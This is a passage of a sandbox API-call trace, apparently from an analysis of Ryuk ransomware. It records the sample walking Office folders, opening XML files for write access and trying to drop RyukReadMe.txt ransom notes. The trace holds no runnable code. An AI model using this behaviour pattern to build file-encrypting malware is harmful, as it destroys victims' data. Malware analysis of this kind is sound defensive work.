hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.542] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IT.XML", dwFileAttributes=0x80) returned 0 [0137.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.it.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.543] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.543] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.543] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.543] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.JP.XML", dwFileAttributes=0x80) returned 0 [0137.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.JP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.543] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.543] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.543] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.543] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.544] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.NO.XML", dwFileAttributes=0x80) returned 0 [0137.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.NO.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.no.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.544] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.544] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.544] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.544] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.544] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.PL.XML", dwFileAttributes=0x80) returned 0 [0137.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.PL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.pl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.544] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.544] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.545] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.SE.XML", dwFileAttributes=0x80) returned 0 [0137.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.SE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.se.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.545] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.545] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.545] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0137.545] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.546] SetLastError (dwErrCode=0x0) [0137.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.548] GetLastError () returned 0x5 [0137.548] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.548] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.549] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.549] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.549] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.549] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.549] SetLastError (dwErrCode=0x0) [0137.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.549] GetLastError () returned 0x5 [0137.549] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.549] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.549] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0137.551] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.551] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.551] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.551] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL001.XML", dwFileAttributes=0x80) returned 0 [0137.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL001.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl001.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.551] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.551] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.551] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.551] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL002.XML", dwFileAttributes=0x80) returned 0 [0137.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL002.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl002.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.552] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.552] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.552] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.552] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL010.XML", dwFileAttributes=0x80) returned 0 [0137.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL010.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl010.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.553] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.553] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.553] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.553] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL011.XML", dwFileAttributes=0x80) returned 0 [0137.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL011.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl011.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.554] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.554] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.554] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.554] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL012.XML", dwFileAttributes=0x80) returned 0 [0137.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL012.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl012.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.554] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.554] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.554] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.554] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.555] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL016.XML", dwFileAttributes=0x80) returned 0 [0137.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL016.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl016.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.555] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.555] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.555] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.555] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.555] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL020.XML", dwFileAttributes=0x80) returned 0 [0137.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL020.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl020.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.555] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.555] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.555] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.556] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL022.XML", dwFileAttributes=0x80) returned 0 [0137.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL022.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl022.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.556] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.556] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.556] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.556] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL026.XML", dwFileAttributes=0x80) returned 0 [0137.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL026.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl026.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.557] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.557] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.557] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.557] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.557] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL027.XML", dwFileAttributes=0x80) returned 0 [0137.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL027.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl027.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.558] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.558] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.558] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.558] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.558] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL044.XML", dwFileAttributes=0x80) returned 0 [0137.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL044.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl044.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.558] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.558] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.558] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.558] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.558] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL048.XML", dwFileAttributes=0x80) returned 0 [0137.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL048.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl048.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.559] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.559] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.559] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.559] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.560] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL054.XML", dwFileAttributes=0x80) returned 0 [0137.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL054.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl054.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.560] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.560] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.560] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.560] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.560] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL058.XML", dwFileAttributes=0x80) returned 0 [0137.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL058.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl058.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.561] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.561] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.561] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.561] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL065.XML", dwFileAttributes=0x80) returned 0 [0137.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL065.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl065.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.561] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.561] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.561] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.561] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL075.XML", dwFileAttributes=0x80) returned 0 [0137.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL075.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl075.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.562] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.562] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.562] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.562] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL077.XML", dwFileAttributes=0x80) returned 0 [0137.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL077.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl077.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.562] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.562] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.563] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.563] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.563] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL078.XML", dwFileAttributes=0x80) returned 0 [0137.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL078.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl078.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.563] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.563] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.563] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.563] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.563] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL081.XML", dwFileAttributes=0x80) returned 0 [0137.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL081.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl081.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.564] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.564] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.564] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.564] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.564] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL082.XML", dwFileAttributes=0x80) returned 0 [0137.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL082.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl082.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.565] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.565] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.565] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.565] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL083.XML", dwFileAttributes=0x80) returned 0 [0137.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL083.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl083.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.566] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.566] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.566] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.566] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL086.XML", dwFileAttributes=0x80) returned 0 [0137.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL086.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl086.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.567] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.567] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.567] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 